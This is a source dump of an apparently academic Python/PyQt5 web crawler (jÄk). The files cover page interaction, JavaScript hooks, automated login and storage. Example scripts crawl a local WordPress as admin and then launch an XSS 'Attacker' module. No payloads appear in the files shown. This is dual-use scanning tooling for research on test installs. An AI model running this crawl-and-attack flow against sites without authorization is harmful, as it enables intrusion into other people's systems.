126 | forms = extract_forms(self.mainFrame())
127 | html = self.mainFrame().toHtml()
128 | #f = open("html.txt", "w")
129 | #f.write(html)
130 | #f.close()
131 | self.mainFrame().setHtml(None)
132 | self._new_clickables.extend(clickables)
133 | self._new_clickables = purge_dublicates(self._new_clickables)
134 | return EventResult.Ok, html, self._new_clickables, forms, links, []
135 |
136 | def jsWinObjClearedHandler(self): #Adding here the js-scripts corresponding to the phases
137 | if not self._analyzing_finished:
138 | self.mainFrame().evaluateJavaScript(self._lib_js)
139 | self.mainFrame().evaluateJavaScript(self._md5)
140 | self.mainFrame().addToJavaScriptWindowObject("jswrapper", self._js_bridge)
141 |
142 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
143 | #logging.debug("Console(FormHandler): " + message + " at: " + str(lineNumber))
144 | pass
145 |
146 | def javaScriptAlert(self, frame, msg):
147 | logging.debug("Alert occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
148 |
149 | def javaScriptConfirm(self, frame, msg):
150 | logging.debug("Confirm occurs in frame: {} with message: {}".format(frame.baseUrl().toString(), msg))
151 | return True
152 |
153 | def loadFinishedHandler(self, result):
154 | if not self._analyzing_finished: # Just to ignoring setting of non page....
155 | self._loading_complete = True
156 |
--------------------------------------------------------------------------------
/crawler/core/interactioncore.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | from PyQt5.Qt import QWebPage, QWebSettings
20 | from PyQt5.QtNetwork import QNetworkProxy, QNetworkRequest
21 | from PyQt5.QtCore import QSize, QUrl, QByteArray
22 |
23 | from time import time, sleep
24 | from core.jsbridge import JsBridge
25 | from models.clickable import Clickable
26 | from models.utils import CrawlSpeed
27 | import logging
28 |
29 | class InteractionCore(QWebPage):
30 | '''
31 | This is the main class for interacting with a webpage, here are all necessary js-files loaded, and signal connections build
32 | '''
33 | def __init__(self, parent, proxy = "", port = 0, crawl_speed = CrawlSpeed.Medium, network_access_manager = None):
34 | QWebPage.__init__(self, parent)
35 | self.app = parent.app
36 | self._js_bridge = JsBridge(self)
37 | self.loadFinished.connect(self.loadFinishedHandler)
38 | self.mainFrame().javaScriptWindowObjectCleared.connect(self.jsWinObjClearedHandler)
39 | self.frameCreated.connect(self.frameCreatedHandler)
40 | self.setViewportSize(QSize(1024, 800))
41 |
42 | if crawl_speed == CrawlSpeed.Slow:
43 | self.wait_for_processing = 1
44 | self.wait_for_event = 2
45 | if crawl_speed == CrawlSpeed.Medium:
46 | self.wait_for_processing = 0.3
47 | self.wait_for_event = 1
48 | if crawl_speed == CrawlSpeed.Fast:
49 | self.wait_for_processing = 0.1
50 | self.wait_for_event = 0.5
51 | if crawl_speed == CrawlSpeed.Speed_of_Lightning:
52 | self.wait_for_processing = 0.01
53 | self.wait_for_event = 0.1
54 |
55 | f = open("js/lib.js", "r")
56 | self._lib_js = f.read()
57 | f.close()
58 |
59 | f = open("js/ajax_observer.js")
60 | self._xhr_observe_js = f.read()
61 | f.close()
62 |
63 | f = open("js/timing_wrapper.js")
64 | self._timeming_wrapper_js = f.read()
65 | f.close()
66 |
67 |
68 | f = open("js/ajax_interceptor.js")
69 | self._xhr_interception_js = f.read()
70 | f.close()
71 |
72 | f = open("js/addeventlistener_wrapper.js")
73 | self._addEventListener = f.read()
74 | f.close()
75 |
76 | f = open("js/md5.js")
77 | self._md5 = f.read()
78 | f.close()
79 |
80 | f = open("js/property_obs.js")
81 | self._property_obs_js = f.read()
82 | f.close()
83 |
84 | enablePlugins = True
85 | loadImages = False
86 | self.settings().setAttribute(QWebSettings.PluginsEnabled, enablePlugins)
87 | self.settings().setAttribute(QWebSettings.JavaEnabled, enablePlugins)
88 | #self.settings().setAttribute(QWebSettings.AutoLoadImages, loadImages)
89 | self.settings().setAttribute(QWebSettings.DeveloperExtrasEnabled, True)
90 | self.settings().setAttribute(QWebSettings.JavascriptEnabled, True)
91 | self.settings().setAttribute(QWebSettings.JavascriptCanOpenWindows, True)
92 |
93 | if network_access_manager:
94 | self.setNetworkAccessManager(network_access_manager)
95 |
96 | if proxy != "" and port != 0:
97 | manager = self.networkAccessManager()
98 | p = QNetworkProxy(QNetworkProxy.HttpProxy, proxy, port, None, None)
99 | manager.setProxy(p)
100 | self.setNetworkAccessManager(manager)
101 |
102 | #Have to connect it here, otherwise I could connect it to the old one and then replaces it
103 | self.networkAccessManager().finished.connect(self.loadComplete)
104 |
105 | def analyze(self, html, requested_url, timeout = 20):
106 | raise NotImplemented()
107 |
108 | def userAgentForUrl(self, url):
109 | return "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
110 |
111 | def loadFinishedHandler(self, result):
112 | pass
113 |
114 | def frameCreatedHandler(self, frame):
115 | pass
116 |
117 | def jsWinObjClearedHandler(self):
118 | pass
119 |
120 | def javaScriptAlert(self, frame, msg):
121 | pass
122 |
123 | def javaScriptConfirm(self, frame, msg):
124 | return True
125 |
126 | def javaScriptPrompt(self, *args, **kwargs):
127 | return True
128 |
129 | def _wait(self, waiting_time=1):
130 | """Wait for delay time
131 | """
132 | deadline = time() + waiting_time
133 | while time() < deadline:
134 | sleep(0)
135 | self.app.processEvents()
136 |
137 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
138 | #logging.debug("Console: " + message + " at: " + str(lineNumber))
139 | pass
140 |
141 | def loadComplete(self, reply):
142 | pass
143 |
144 | def add_eventlistener_to_element(self, msg):
145 | #logging.debug(msg)
146 | if "id" in msg and msg['id'] != "":
147 | id = msg['id']
148 | else:
149 | id = None
150 | dom_address = msg['addr']
151 | event = msg['event']
152 | if event == "":
153 | event = None
154 | tag = msg['tag']
155 | if "class" in msg and msg['class'] != "":
156 | html_class = msg['class']
157 | else:
158 | html_class = None
159 | function_id = msg['function_id']
160 | if tag is not None and dom_address != "":
161 | tmp = Clickable(event, tag, dom_address, id, html_class, function_id=function_id)
162 | if tmp not in self._new_clickables:
163 | self._new_clickables.append(tmp)
164 |
165 |
166 | def search_element_with_id(self, element_id):
167 | elem = self.mainFrame().findAllElements("#" + str(element_id))
168 | if len(elem) > 0:
169 | return elem[0] # maybe check if there is more than one element
170 | else:
171 | return None
172 |
173 | def search_element_with_class(self, cls, dom_adress):
174 | css_cls_definition = ""
175 | classes = cls.split(" ")
176 | for cls in classes: #converting class names in css-compatible classnames
177 | cls = "." + cls
178 | css_cls_definition = css_cls_definition + cls + " "
179 | elems = self.mainFrame().findAllElements(css_cls_definition)
180 | for elem in elems:
181 | if dom_adress == elem.evaluateJavaScript("getXPath(this)"):
182 | return elem
183 |
184 | def search_element_without_id_and_class(self, dom_adress):
185 | check_dom_adress = dom_adress
186 | dom_address = dom_adress.split("/")
187 | current_element_in_dom = self.mainFrame().documentElement() #Is HTML-Element
188 | while len(dom_address) > 0 and current_element_in_dom is not None:
189 | target_tag_name = dom_address.pop(0) # Get and remove the first element
190 | target_tag_name = target_tag_name.upper()
191 | if len(target_tag_name) == 0:
192 | continue
193 | elif target_tag_name == "HTML": #or target_tag_name == "body":
194 | continue
195 | else:
196 | tmp = target_tag_name.find("[")
197 | if tmp > 0: # target_tag_name looks like tagname[index]
198 | target_tag_name = target_tag_name.split("[")
199 | index = int(target_tag_name[1].split("]")[0]) # get index out of target_tag_name
200 | target_tag_name = target_tag_name[0] # target_tag_name name
201 | last_child = current_element_in_dom.lastChild()
202 | tmp_element = current_element_in_dom.findFirst(target_tag_name) # takes first child
203 | if tmp_element.tagName() == target_tag_name: # if firstchild is from type of target_tag_name, subtrakt 1 from index
204 | index -= 1;
205 | counter = 100 #Sometimes comparing with last child went wrong, therefore we have an backup fragment_counter
206 | while index > 0 and tmp_element != last_child: # take next sibbling until index is 0, if target_tag_name is equal subtrakt one
207 | tmp_element = tmp_element.nextSibling() #
208 | if tmp_element.tagName() == target_tag_name:
209 | index -= 1
210 | counter -= 1
211 | if counter == 0: #If fragment_counter 0 then break, we wont find it anymore
212 | current_element_in_dom = None
213 | break
214 | if index == 0 and tmp_element.tagName() == target_tag_name:
215 | current_element_in_dom = tmp_element
216 | else: #We miss the element
217 | current_element_in_dom = None
218 | else: #target_tag_name is the only of his type, or the first...is die hell
219 | tmp_element = current_element_in_dom.firstChild()
220 | last_child = current_element_in_dom.lastChild()
221 | counter = 100
222 | while tmp_element.tagName() != target_tag_name and tmp_element != last_child and counter > 0:
223 | #logging.debug(tmp_element.tagName())
224 | counter -= 1
225 | if tmp_element.tagName() == target_tag_name:
226 | current_element_in_dom = tmp_element
227 | break
228 | else:
229 | tmp_element = tmp_element.nextSibling()
230 | if tmp_element.tagName() != target_tag_name or counter == 0:
231 | current_element_in_dom = None
232 | else:
233 | current_element_in_dom = tmp_element
234 |
235 | tmp_element = None
236 | last_child = None
237 | dom_address = None
238 |
239 | if current_element_in_dom == None:
240 | return None
241 | if current_element_in_dom.evaluateJavaScript("getXPath(this)") != check_dom_adress:
242 | logging.debug("Element not found: " + str(current_element_in_dom.evaluateJavaScript("getXPath(this)")) + " : " + str(check_dom_adress))
243 | return None
244 | else:
245 | return current_element_in_dom
246 |
247 |
248 | def make_request(self, url):
249 | request = QNetworkRequest()
250 | request.setUrl(QUrl(url))
251 | return request
252 |
253 | def post_data_to_array(self, post_data):
254 | post_params = QByteArray()
255 | for (key, value) in post_data.items():
256 | if isinstance(value, list):
257 | for val in value:
258 | post_params.append(key + "=" + val + "&")
259 | else:
260 | post_params.append(key + "=" + value + "&")
261 | post_params.remove(post_params.length() - 1, 1)
262 | return post_params
--------------------------------------------------------------------------------
/crawler/core/jaekcore.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from asyncio.tasks import sleep
19 | import logging
20 | from PyQt5.Qt import QApplication, QObject
21 | from PyQt5.QtNetwork import QNetworkAccessManager
22 | import sys
23 | from copy import deepcopy
24 | from analyzer.mainanalyzer import MainAnalyzer
25 | from core.eventexecutor import EventResult, EventExecutor
26 | from core.formhandler import FormHandler
27 | from models.webpage import WebPage
28 | from utils.asyncrequesthandler import AsyncRequestHandler
29 | from utils.execptions import LoginFailed
30 | from utils.utils import count_cookies, calculate_similarity_between_pages
31 |
32 | __author__ = 'constantin'
33 |
34 | class JaekCore(QObject):
35 |
36 |
37 | def __init__(self, config, proxy="", port=0, database_manager=None):
38 | QObject.__init__(self)
39 | self.app = QApplication(sys.argv)
40 | self._network_access_manager = QNetworkAccessManager(self)
41 | self.user = None
42 | self.proxy = proxy
43 | self.port = port
44 | self.config = config
45 | self.database_manager = database_manager
46 | self.domain_handler = None
47 | self.process_with_login = False
48 | self.async_request_handler = AsyncRequestHandler(self.database_manager)
49 |
50 | self._event_executor = EventExecutor(self, proxy, port, crawl_speed=config.process_speed,
51 | network_access_manager=self._network_access_manager)
52 | self._dynamic_analyzer = MainAnalyzer(self, proxy, port, crawl_speed=config.process_speed,
53 | network_access_manager=self._network_access_manager)
54 | self._form_handler = FormHandler(self, proxy, port, crawl_speed=config.process_speed,
55 | network_access_manager=self._network_access_manager)
56 |
57 | self.cookie_num = -1
58 | self.interactive_login_form_search = False
59 |
60 | def _find_form_with_special_parameters(self, page, login_data, interactive_search=True):
61 | keys = list(login_data.keys())
62 | data1 = keys[0]
63 | data2 = keys[1]
64 | for form in page.forms:
65 | if form.toString().find(data1) > -1 and form.toString().find(data2) > -1:
66 | return form, None
67 | if interactive_search:
68 | for clickable in page.clickables:
69 | tmp_page = deepcopy(page)
70 | event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable)
71 | if delta_page is None:
72 | sleep(2000)
73 | event_state, delta_page = self._event_executor.execute(tmp_page, element_to_click=clickable)
74 | if delta_page is None:
75 | continue
76 | delta_page = self.domain_handler.complete_urls_in_page(delta_page)
77 | delta_page = self.domain_handler.analyze_urls(delta_page)
78 | if event_state == EventResult.Ok:
79 | for form in delta_page.forms:
80 | if form.toString().find(data1) > -1 and form.toString().find(data2) > -1:
81 | return form, clickable
82 | return None, None
83 |
84 | def _initial_login(self):
85 | logging.debug("Initial Login...")
86 | self._page_with_loginform_logged_out = self._get_webpage(self.user.url_with_login_form)
87 | num_of_cookies_before_login = count_cookies(self._network_access_manager, self.user.url_with_login_form)
88 | logging.debug("Number of cookies before initial login: {}".format(num_of_cookies_before_login))
89 | self._login_form, login_clickables = self._find_form_with_special_parameters(self._page_with_loginform_logged_out, self.user.login_data)
90 | if self._login_form is None:
91 | f = open("No_login_form.txt", "w")
92 | f.write(self._page_with_loginform_logged_out.html)
93 | f.close()
94 | raise LoginFailed("Cannot find Login form, please check the parameters...")
95 |
96 | page_after_login = self._login_and_return_webpage(self._login_form, self._page_with_loginform_logged_out, self.user.login_data, login_clickables)
97 | if page_after_login is None:
98 | raise LoginFailed("Cannot load loginpage anymore...stop...")
99 | login_successfull = calculate_similarity_between_pages(self._page_with_loginform_logged_out, page_after_login) < 0.5
100 | if login_successfull:
101 | num_cookies_after_login = count_cookies(self._network_access_manager, self.user.url_with_login_form)
102 | if num_cookies_after_login > num_of_cookies_before_login:
103 | self.cookie_num = num_cookies_after_login
104 | logging.debug("Initial login successfull!")
105 | if login_clickables is not None:
106 | return True, True # If we login with a click
107 | else:
108 | return True, False # If we don't login with a click
109 | raise LoginFailed("Cannot login, sorry...")
110 |
111 | def _login_and_return_webpage(self, login_form, page_with_login_form=None, login_data=None, login_clickable= None):
112 | if page_with_login_form is None:
113 | page_with_login_form = self._page_with_loginform_logged_out
114 | try:
115 | if login_clickable is not None:
116 | tmp_page = deepcopy(page_with_login_form)
117 | event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable)
118 | if event_state == EventResult.ErrorWhileInitialLoading:
119 | sleep(2000)
120 | event_state, page_with_login_form = self._event_executor.execute(tmp_page, element_to_click=login_clickable)
121 | if event_state == EventResult.ErrorWhileInitialLoading:
122 | logging.debug("Two time executing fails.. stop crawling")
123 | return None
124 | self.domain_handler.complete_urls_in_page(page_with_login_form)
125 | self.domain_handler.analyze_urls(page_with_login_form)
126 | self.async_request_handler.handle_requests(page_with_login_form)
127 | logging.debug("Start submitting login form...")
128 | response_code, html_after_timeouts, new_clickables, forms, links, timemimg_requests = self._form_handler.submit_form(login_form, page_with_login_form, login_data)
129 | except ValueError:
130 | return None
131 | #TODO: Put building of Webpage inside submit function
132 | page_after_login = WebPage(-1, page_with_login_form.url, html_after_timeouts)
133 | page_after_login.clickables = new_clickables
134 | page_after_login.links = links
135 | page_after_login.timing_requests = timemimg_requests
136 | page_after_login.forms = forms
137 | self.domain_handler.complete_urls_in_page(page_after_login)
138 | self.domain_handler.analyze_urls(page_after_login)
139 | self.async_request_handler.handle_requests(page_after_login)
140 | return page_after_login
141 |
142 | def _handle_possible_logout(self):
143 | """
144 | Handles a possible logout
145 | :return: True is we were not logged out and false if we were logged out
146 | """
147 | retries = 0
148 | max_retries = 3
149 | while retries < max_retries:
150 | logging.debug("Start with relogin try number: {}".format(retries+1))
151 | page_with_login_form = self._get_webpage(self.user.url_with_login_form)
152 | login_form, login_clickable = self._find_form_with_special_parameters(page_with_login_form, self.user.login_data, self.interactive_login_form_search)
153 | if login_form is not None:
154 | #So login_form is visible, we are logged out
155 | logging.debug("Logout detected, visible login form...")
156 | hopefully_reloggedin_page = self._login_and_return_webpage(login_form, page_with_login_form, self.user.login_data, login_clickable)
157 | if hopefully_reloggedin_page is None:
158 | retries += 1
159 | logging.debug("Relogin attempt number {} failed".format(retries))
160 | sleep(2000)
161 | else:
162 | login_form, login_clickable = self._find_form_with_special_parameters(hopefully_reloggedin_page, self.user.login_data)
163 | if login_form is None:
164 | logging.debug("Relogin successfull...continue")
165 | return False
166 | else:
167 | logging.debug("Relogin fails, loginform is still present...")
168 | retries += 1
169 | sleep(2000)
170 | else:
171 | logging.debug("Login form is not there... we can continue (I hope)")
172 | if retries < 3:
173 | return True
174 | else:
175 | return False
176 | raise LoginFailed("We cannot login anymore... stop crawling here")
177 |
178 |
179 | def _get_webpage(self, url):
180 | response_code, result = self._dynamic_analyzer.analyze(url, timeout=10)
181 | self.domain_handler.complete_urls_in_page(result)
182 | self.domain_handler.analyze_urls(result)
183 | self.async_request_handler.handle_requests(result)
184 | return result
185 |
186 | def _check_login_status_with_cookies(self):
187 | if self.cookie_num > 0:
188 | current_cookie_num = count_cookies(self._network_access_manager, self.user.url_with_login_form)
189 | return current_cookie_num >= self.cookie_num
190 | return True
191 |
--------------------------------------------------------------------------------
/crawler/core/jsbridge.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import json
19 | from PyQt5.QtCore import QObject, pyqtSlot
20 |
21 | __author__ = 'constantin'
22 |
23 | class JsBridge(QObject):
24 |
25 | def __init__(self, analyzer):
26 | QObject.__init__(self)
27 | self.analyzer = analyzer
28 | self._ajax_request = []
29 |
30 | @pyqtSlot(str)
31 | def add_eventListener_to_element(self, msg):
32 | msg = json.loads(msg)
33 | self.analyzer.add_eventlistener_to_element(msg)
34 |
35 | @pyqtSlot(str)
36 | def xmlHTTPRequestOpen(self, msg):
37 | msg = json.loads(msg)
38 | self._ajax_request.append(msg)
39 |
40 | @pyqtSlot(str)
41 | def xmlHTTPRequestSend(self, msg):
42 | msg = json.loads(msg)
43 | according_open = self._ajax_request.pop(0)
44 | try:
45 | according_open['parameters'] = msg['parameters'][0]
46 | except IndexError:
47 | according_open['parameters'] = ""
48 | self.analyzer.capturing_requests(according_open)
49 |
50 | @pyqtSlot(str)
51 | def timeout(self, msg):
52 | msg = json.loads(msg)
53 | msg['type'] = "timeout"
54 | self.analyzer.capture_timeout_call(msg)
55 |
56 | @pyqtSlot(str)
57 | def intervall(self, msg):
58 | msg = json.loads(msg)
59 | msg['type'] = "intervall"
60 | #logging.debug(msg)
61 | self.analyzer.capture_timeout_call(msg)
62 |
63 | @pyqtSlot(str)
64 | def add_eventlistener_to_element(self, msg):
65 | msg = json.loads(msg)
66 | #logging.debug(msg)
67 | self.analyzer.add_eventlistener_to_element(msg)
68 |
69 | @pyqtSlot(str)
70 | def attack(self, msg):
71 | self.analyzer.xss_callback(msg)
--------------------------------------------------------------------------------
/crawler/database/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
--------------------------------------------------------------------------------
/crawler/database/databasemanager.py:
--------------------------------------------------------------------------------
1 | """
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 | This Class is responsible for storage related things
18 |
19 | """
20 | from database.database import Database
21 | from models.clickabletype import ClickableType
22 |
23 |
24 | class DatabaseManager(object):
25 |
26 | def __init__(self, user, dropping=True):
27 | self._database = Database(user.username, dropping)
28 | self._database.insert_user_into_db(user)
29 | self._web_page_cache = []
30 | self._deltapage_cache = []
31 | self._current_session = None
32 | self.MAX_CACHE_SIZE = 0
33 | self._current_session = user.session
34 |
35 | def return_session_id_to_username(self, username):
36 | return self._database.get_user_to_username(username)
37 |
38 | def store_web_page(self, web_page):
39 | if self.MAX_CACHE_SIZE > 0:
40 | if len(self._web_page_cache) + 1 > self.MAX_CACHE_SIZE:
41 | del self._web_page_cache[-1]
42 | self._web_page_cache.insert(0, web_page)
43 | self._database.insert_page_into_db(self._current_session, web_page)
44 |
45 | def get_page_to_id(self, page_id):
46 | page = self.get_web_page_to_id(page_id)
47 | if page is not None:
48 | return page
49 | page = self.get_delta_page_to_id(page_id)
50 | if page is not None:
51 | return page
52 | return None
53 |
54 | def store_delta_page(self, delta_page):
55 | if self.MAX_CACHE_SIZE > 0:
56 | if len(self._deltapage_cache) +1 > self.MAX_CACHE_SIZE:
57 | del self._deltapage_cache[-1]
58 | self._deltapage_cache.insert(0, delta_page)
59 | self._database.insert_delta_page_into_db(self._current_session, delta_page)
60 |
61 | def get_page_to_url(self, url):
62 | try:
63 | url = url.toString()
64 | except AttributeError:
65 | url = url
66 |
67 | return self._database.get_webpage_to_url_from_db(self._current_session, url)
68 |
69 | def get_web_page_to_id(self, page_id):
70 | for page in self._web_page_cache:
71 | if page_id == page.id:
72 | return page
73 | return self._database.get_webpage_to_id_from_db(self._current_session, page_id)
74 |
75 |
76 | def get_delta_page_to_id(self, delta_page_id):
77 | for page in self._deltapage_cache:
78 | if delta_page_id == page.id:
79 | return page
80 |
81 | return self._database.get_delta_page_to_id(self._current_session, delta_page_id)
82 |
83 | def url_exists(self, url):
84 | return self._database.url_exists(self._current_session, url)
85 |
86 | def get_next_url_for_crawling(self):
87 | return self._database.get_next_url_for_crawling(self._current_session)
88 |
89 | def get_all_unvisited_urls_sorted_by_hash(self):
90 | return self._database.get_all_unvisited_urls_sorted_by_hash(self._current_session)
91 |
92 | def insert_url_into_db(self, url):
93 | return self._database.insert_url_into_db(self._current_session, url)
94 |
95 | def insert_redirected_url(self, url):
96 | return self._database.insert_url_into_db(self._current_session, url, is_redirected_url=True)
97 |
98 | def visit_url(self, url, webpage_id, response_code, redirected_to = None):
99 | self._database.visit_url(self._current_session, url, webpage_id, response_code, redirected_to)
100 |
101 | def extend_ajax_requests_to_webpage(self, webpage, ajax_reuqests):
102 | self._database.extend_ajax_requests_to_webpage(self._current_session, webpage, ajax_reuqests)
103 |
104 |
105 | def get_all_crawled_delta_pages(self, url=None):
106 | return self._database.get_all_crawled_deltapages_to_url_from_db(self._current_session, url)
107 |
108 |
109 | def update_clickable(self, web_page_id, clickable):
110 | if clickable.clickable_type == ClickableType.IgnoredByCrawler or clickable.clickable_type == ClickableType.UnsupportedEvent:
111 | self._database.set_clickable_ignored(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type)
112 | else:
113 | self._database.set_clickable_clicked(self._current_session, web_page_id, clickable.dom_address, clickable.event, clickable.clickable_depth, clickable.clickable_type, clickable.links_to)
114 |
115 | def get_url_structure(self, hash):
116 | return self._database.get_url_structure_from_db(self._current_session, hash)
117 |
118 | def insert_url_structure(self, url_description):
119 | self._database.insert_url_structure_into_db(self._current_session, url_description)
120 |
121 | def get_all_pages(self):
122 | return self._database.get_all_pages(self._current_session)
123 |
124 | def get_url_structure_to_hash(self, url_hash):
125 | return self._database.get_url_structure_from_db(self._current_session,url_hash)
126 |
127 | def insert_url_structure_into_db(self, url_description):
128 | self._database.insert_url_structure_into_db(self._current_session, url_description)
129 |
130 | def get_url_to_id(self, id):
131 | return self._database.get_url_to_id(self._current_session, id)
132 |
133 | def write_clusters(self, url_hash, clusters):
134 | self._database.write_cluster(self._current_session, url_hash, clusters)
135 |
136 | def get_clusters(self, url_hash):
137 | return self._database.get_clusters(self._current_session, url_hash)
138 |
139 | def count_visited_url_per_hash(self, url_hash):
140 | return self._database.count_visited_urls_per_hash(self._current_session, url_hash)
141 |
142 | def get_all_url_structures(self):
143 | return self._database.get_all_url_structures(self._current_session)
144 |
145 | def get_all_visited_urls(self):
146 | return self._database.get_all_successfully_visited_urls(self._current_session)
147 |
148 | def get_one_visited_url_per_structure(self):
149 | return self._database.get_one_visited_url_per_structure(self._current_session)
150 |
151 | def insert_attack_result(self, result, attack_url):
152 | self._database.insert_attack_result(self._current_session, result, attack_url)
153 |
154 | def get_asyncrequest_structure(self, structure_hash=None):
155 | return self._database.get_asyncrequest_structure(self._current_session, structure_hash)
156 |
157 | def get_all_get_forms(self):
158 | return self._database.get_all_get_forms(self._current_session)
159 |
160 | def get_one_form_per_destination(self):
161 | return self._database.get_one_form_per_destination(self._current_session)
162 |
163 | def num_of_ignored_urls(self, url_hash):
164 | return self._database.num_of_ignored_urls(self._current_session, url_hash)
165 |
166 | def url_visited(self, url):
167 | return self._database.url_visited(self._current_session, url)
168 |
169 | def get_id_to_url(self, url):
170 | return self._database.get_id_to_url(self._current_session, url)
171 |
172 | def get_all_urls_to_domain(self, domain):
173 | return self._database.get_all_urls_to_domain(self._current_session, domain)
--------------------------------------------------------------------------------
/crawler/example.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | import logging
19 |
20 | from attacker import Attacker
21 | from crawler import Crawler
22 | from database.databasemanager import DatabaseManager
23 | from utils.config import CrawlConfig, AttackConfig
24 | from models.utils import CrawlSpeed
25 | from utils.user import User
26 | import csv
27 | from utils.utils import calculate_similarity_between_pages
28 |
29 | logging.basicConfig(level=logging.DEBUG,
30 | format='%(asctime)s: %(levelname)s - %(message)s',
31 | #filename='Attack.log',
32 | #filemode='w'
33 | )
34 |
35 | if __name__ == '__main__':
36 | logging.info("Crawler started...")
37 |
38 | # This is for example to crawl a wordpress installation as logged in user
39 | user = User("Wordpress", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
40 |
41 | url = "http://localhost/"
42 |
43 | # This is the confuigrtion I used for the experiments
44 | crawler_config = CrawlConfig("jÄk", url, max_depth=3, max_click_depth=3, crawl_speed=CrawlSpeed.Fast)
45 | attack_config = AttackConfig(url)
46 |
47 | database_manager = DatabaseManager(user, dropping=True)
48 | # Uncomment out the end of the next line to use a proxy
49 | crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
50 | crawler.crawl(user)
51 | logging.info("Crawler finished")
52 |
53 | logging.info("Start attacking...")
54 | attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
55 | attacker.attack(user)
56 | logging.info("Finish attacking...")
--------------------------------------------------------------------------------
/crawler/experiments_paper.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 | Created on 12.11.2014
18 |
19 | @author: constantin
20 | '''
21 | import logging
22 |
23 | from attacker import Attacker
24 | from crawler import Crawler
25 | from database.databasemanager import DatabaseManager
26 | from utils.config import CrawlConfig, AttackConfig
27 | from models.utils import CrawlSpeed
28 | from utils.user import User
29 | import csv
30 | from utils.utils import calculate_similarity_between_pages
31 |
32 | logging.basicConfig(level=logging.DEBUG,
33 | format='%(asctime)s: %(levelname)s - %(message)s',
34 | #datefmt='%d.%m.%Y %H:%M:%S.%f',
35 | #filename='Attack.log',
36 | #filemode='w'
37 | )
38 |
39 | if __name__ == '__main__':
40 | logging.info("Crawler started...")
41 |
42 | #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
43 | #user = User("constantin", 0, "http://localhost:8080/", login_data = {"username" : "admin", "pass" : "admin"})
